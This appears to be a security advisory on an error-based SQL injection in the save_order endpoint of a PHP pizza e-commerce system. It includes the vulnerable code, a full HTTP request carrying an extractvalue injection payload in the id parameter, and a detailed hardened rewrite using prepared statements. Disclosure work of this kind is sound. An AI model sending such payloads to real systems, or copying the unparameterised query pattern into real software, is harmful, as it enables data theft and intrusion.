# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

* **Vulnerability Type**: Error-Based SQL Injection
* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=save_order`
* **Description**: The `id` POST parameter is pulled into scope by `extract($_POST)` and concatenated, unquoted and unvalidated, into the `WHERE c.user_id = $id` clause of the cart `SELECT` query. Because the raw `$this->conn->error` string is returned to the client, an attacker can inject SQL and read the results of error-based payloads directly in the response.
* **Severity**: HIGH
* **Status**: Unpatched

## Impact Scope

* **Confidentiality**: Full disclosure of database schema and user credentials.
* **Integrity**: Unauthorized data deletion or modification.
* **Availability**: Service denial caused by large-scale data deletion.
* **Privilege Escalation**: Session hijacking and administrative access via extraction of session data.

## Proof of Concept (PoC)

**1. Vulnerable Code**

```php
public function save_order() {
    if (!isset($_SESSION['login_user_id'])) {
        return "0";
    }
    extract($_POST);
    $user_id = $_SESSION['login_user_id'];
    $fname = $first_name . ' ' . $last_name;
    if (empty($id)) {
        $id = $_SESSION['login_user_id'];
    }
    // $id comes straight from the request and is interpolated into the query
    $cart_items = $this->conn->query("SELECT c.*, p.price, p.name FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = $id OR c.user_id = '$user_id'");
    if (!$cart_items) {
        // raw database error is returned to the client
        return $this->conn->error;
    }
    if ($cart_items->num_rows == 0) {
        return "0";
    }
    ...
}
```

**2. Exploit Payload**

```http
POST /pizzafy/admin/ajax.php?action=save_order HTTP/1.1
Host: localhost
Content-Length: 83
sec-ch-ua: ""
Accept: text/plain, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/checkout.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=rvkxm3H4np0cR0khm0620jd83
Connection: close

first_name=test&last_name=test&email=test%40gmail.com&mobile=156156&address=15615&id=-8 OR extractvalue(1,concat(0x7e,database()))
```

## Remediation

* **Use Prepared Statements**: Use parameterized queries so that user-supplied values are bound as data and never parsed as SQL.

```php
$stmt = $this->conn->prepare("SELECT c.*, p.price, p.name FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = ?");
$stmt->bind_param("i", $user_id);
$stmt->execute();
$cart_items = $stmt->get_result();
```

* **Input Validation**: Validate and filter the `id` parameter, allowing only expected values (here, a positive integer).
* **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection.
* **Monitoring and Logging**: Track and alert on anomalous patterns, such as slow queries or repeated access attempts.
* **Security Testing**: Conduct regular penetration testing and code reviews to identify and fix vulnerabilities.
* **Error Handling**: Avoid exposing database-related errors in responses, since the returned error text is what makes the error-based technique above work.
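The remediation items above can be applied together in one hardened version of the method. The following is an added example written for this advisory, not code from the Pizzafy project; it assumes the same mysqli connection in `$this->conn`, the same `login_user_id` session key, and the same `cart` / `product_list` tables as the vulnerable function, and it stubs the class around the method so the snippet is self-contained.

```php
<?php
// Added example (not the Pizzafy project's code): save_order() with input
// validation, prepared statements, and no database errors sent to the client.
class CartService
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    public function save_order(): string
    {
        if (!isset($_SESSION['login_user_id'])) {
            return "0";
        }
        $user_id = (int) $_SESSION['login_user_id'];

        // Read only the fields we expect. extract($_POST) would let a request
        // overwrite any local variable, including $user_id.
        $first_name = $_POST['first_name'] ?? '';
        $last_name  = $_POST['last_name'] ?? '';
        $fname = $first_name . ' ' . $last_name;

        // Input validation: `id` must be a positive integer. Anything else
        // (including the "-8 OR ..." payload) falls back to the session id
        // and never reaches the query.
        $id = filter_var(
            $_POST['id'] ?? '',
            FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1]]
        );
        if ($id === false) {
            $id = $user_id;
        }

        // Prepared statement: both values are bound as integers ("ii"), so
        // the database receives them as data, not as SQL text.
        $stmt = $this->conn->prepare(
            "SELECT c.*, p.price, p.name
               FROM cart c
               JOIN product_list p ON c.product_id = p.id
              WHERE c.user_id = ? OR c.user_id = ?"
        );
        if ($stmt === false) {
            // Error handling: log server-side, return a generic status.
            error_log('save_order prepare failed: ' . $this->conn->error);
            return "0";
        }
        $stmt->bind_param("ii", $id, $user_id);
        if (!$stmt->execute()) {
            error_log('save_order execute failed: ' . $stmt->error);
            return "0";
        }
        $cart_items = $stmt->get_result();
        if ($cart_items->num_rows == 0) {
            return "0";
        }
        // ... remainder of the original order-saving logic, unchanged
        return "1";
    }
}
```

With the integer binding in place, the value of `id` can no longer change the shape of the query, and because the method returns only `"0"` or `"1"` to the caller, a failed query no longer hands the attacker the error text that error-based injection depends on. Restricting the application's database account to the `SELECT`/`INSERT`/`UPDATE` rights it actually needs is a separate step on the database side and is not shown here.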